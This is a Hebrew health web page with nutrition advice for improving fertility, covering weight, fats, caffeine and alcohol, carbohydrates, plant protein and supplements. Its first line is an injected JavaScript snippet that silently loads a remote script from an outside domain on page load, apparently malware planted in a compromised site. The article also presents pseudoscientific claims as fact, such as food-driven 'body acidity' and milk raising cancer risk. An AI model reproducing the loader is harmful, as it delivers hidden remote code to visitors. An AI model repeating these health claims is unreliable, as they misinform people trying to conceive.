;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); תזונה נכונה לשיפור הפוריות
תזונה נכונה

איך אפשר לשפר את הפוריות והכניסה להריון באמצעות תזונה

לקט המלצות של מומחי פוריות  לשיפור הפוריות. בנוסף לגורם החשוב של קיום יחסים כמה שיותר סמוך למועד הביוץ תוכלו לעזור לגוף שלכם באמצעות תזונה. המאמר מיועד לשני המינים.

1. בקרת משקל – עודף משקל או תת משקל יכול לעכב את משך הזמן שלוקח להריון להיקלט.

ויליאם גיבונס, מנהל המחלקה לאנדוקרינולוגיה ופוריות באוניברסיטת ביילור, אומר ששמירה על משקל בריא הוא לרוב נושא שמתעלמים ממנו במרכזי פוריות בזמן שהוא אחד הגורמים היותר מרכזיים שמשפיעים על מועד ההקלטות.

במחקר שלו, חוקרים העריכו את מדד מסת גוף (BMI) של 2,112 נשים בהריון. נשים בעלות BMI לפני הריון המראה על משקל עודף – הראו גם על כפול מהזמן הדרוש לבעלות BMI  נורמלי להיכנס להריון. BMI נמוך מ 19 (18.5-24.9 נחשב נורמליים) הוא אפילו יותר בעייתי, לטענת החוקרים, זמן ההתעברות היה גדול פי 4 בנשים עם BMI מתחת 19.

2. עודף שומן – מדברים על שומן רווי וכולסטרול הרבה בהקשר של מחלות וכשלים בסביבת הלב וכלי הדם המרכזיים, אלו שיוצאים ונכנסים למשאבה המופלאה שלנו.

העיסוק סביב הלב אכן עיקרי וגם קריטי שמדברים על סכנות ממשיות לחיים ולגורמי סיכון שיכולים לשבש עד להפסיק את פעולתו. פחות מסוכן, אבל עדיין באותו האופן שבו הצטברויות של עודף שומן רווי וכולסטרול נצמדות לדפנות כלי הדם בסביבת הלב, ככה בדיוק הם מצטברות בכלי הדם שבסביבת איברי הרבייה, וכפועל יוצא נוצרים קשיים בתפקוד וכמובן גם בעיות פוריות.

רצוי לשמור על תפריט דל בשומן רווי, כלומר, לוותר על מקורות מהחי, להעדיף שומן צמחי בלתי רווי,
ולהגביר ירקות, עלים וסיבים בעלי אפקט מנקה לגוף ותורם לפעילות המטבולית.
אגב שמנים צמחיים, אם צריך להשתמש בחומר סיכה, שמן קנולה או שמן בוטנים הם אופציות טובות. חומרי סיכה על בסיס מים, כגון Astroglide, KY ג'לי, ומגע, עלולות לעכב תנועתיות זרע לכדי 60% עד 100%.

3. משקאות – הרבה קפאין או יותר מדי אלכוהול יכול לפגוע בפוריות של אישה.

מומחים אומרים כי שתייה של יותר מחמש כוסות קפה ביום, שווה ערך לכ-500 מיליגרם של קפאין – מזוהה עם פריון נמוך יותר. צריכת קפאין מתונה אפשרית. ההמלצה היא להישאר תחת 200 עד 250 מיליגרם קפאין ביום.

מחקרים על צריכת אלכוהול ופוריות של נשים הפיקו ממצאים מעורבים. אבל חוקרים שוודים מצאו כי לנשים ששתו שני משקאות אלכוהוליים ביום נרשמה ירידה  של כמעט 60%. למרות שרמות מתונות של אלכוהול – אינן בהכרח פוגעות בפוריות – עדיף להימנע כאשר מנסים להיכנס להריון.

שתייה בזמן ההריון מגבירה את הסיכון למומים מולדים אצל העובר.
עישון רב – פוגע בכמות וייצור הזרע ומגדיל סיכון להפלות.
שתיית מים מספקת את כל מה שהגוף זקוק על מנת לשחזר נוזלים שאבדו דרך חילוף חומרים, נשימה, הזעה, ופינוי פסולת. זה המשקה המושלם להרוות צמא ולשמור על לחות המערכות בגוף.
אי אפשר להגדיר דרישה לכמה מים הגוף צריך, הכמות שאתם צריכים תלויה בכמה אתם אוכלים, מה מזג האוויר, וכמה אתם פעילים. באשר לעצות התזונה החוזרות והנשנות לשתיית שמונה כוסות מים בכל יום, יש מעט ראיות כדי לתמוך בהן, אבל זוהי דרך טובה כדי למלא את דרישת הנוזלים של אדם.
רצוי להימנע ממשקאות אחרים במיוחד החומציים שבהם – אלה שמעלים את רמת החומציות בגוף – חלב, אלכוהול, קפאין, תוססים ודיאטטיים – השאירו מחוץ לתפריט.
חלב הוא הגרוע מבניהם, רמת ההורמונים הגבוהה שבו, גם בדל שומן, שמכיל פחות שומן רווי,
עלול להעלות את הסיכון של סרטן ערמונית וסרטן השחלות.

4. עברו לפחמימות מלאות ולחלבון מהצומח
מחקרים מראים שנשים שצרכו הרבה פחמימות פשוטות, בעיקר קמח לבן ודברי מתיקה, התקשו בכניסה להריון. פחמימות פשוטות (ריקות) נספגות מהר לדם, ולכן מעלות במהירות את רמות הסוכר – מה שעלול לשבש את המאזן ההורמונלי ולעודד תהליכים דלקתיים בגוף. פחמימות מלאות, לעומת זאת, נספגות לאט בדם הן עשירות בסיבים תזונתיים וחשובים לאיזון ההורמונלי של הגוף. התוצאה – תהליכים מטבוליים איטיים ויציבים יותר.

ממצאי מחקרים מראים כי צריכה של חלבון מן החי מעלה את הסיכון לאי פוריות שחלתי. ואילו צריכת חלבון מן הצומח מגינה על הגוף ומעודדת פריון.

מקורות טובים לחלבון צמחי הם שילוב של דגנים מלאים וקטניות (שעועית, עדשים, חומוס), סויה ומוצריה, אגוזים, שקדים, טופו וקינואה.

5. להימנע ממזונות שמעלים את רמת החומציות של הגוף – רמה חומצית גבוהה גורמת לגוף להיכנס לכוננות ולגרום לתגובות דלקתיות, בנוסף מאזנות את הרמה החומצית על ידי שימוש במאגרים של מינרלים הנמצאים בעצמות ובתאים.

מזונות שמעלים את רמת החומציות:
קפה, אלכוהול, משקאות קלים ומוגזים, ממתיקים מלאכותיים
בשר, בעיקר פסטרמות ונקניקים
ביצים
חלב גבינות ויוגורט
מזון מעובד כמו רטבים קנויים בגלל מעכבי חמצון ומלחים שונים
פחמימות ריקות וסוכר לבן – לחם לבן

6. פעילות גופנית מתונה – תורמת לפעילות תקינה וחילוף חומרים מהיר, מייעלת ומחזקת את תפקוד המערכות והאיברים.

7. הוספת חומרים מזינים – חשוב לשים לב ולהיות במעקב שלא חסר לגוף ויטמינים ומינרלים שחיוניים לפעילות תקינה ומאוזנת הורמונלית.

חומצה פולית וברזל חיוניים ובדר"כ גם בין החוסרים היותר נפוצים כיוון שהגוף המכין עצמו להריון זקוק להם במיוחד.
אומגה 3 ממקור צמחי גם עוזרת לשמור על הגוף, כיוון שיש לו אפקט מרגיע ומאזן.
גם הוויטמינים A, D, B6 ו B12 תורמים לבריאות מערכת הרבייה ולאיזון המערכת ההורמונלית.

אבל לא צריך לחכות להריון כדי לשמור על תזונה נכונה, עדיף להתחיל כבר עכשיו.

כתיבת תגובה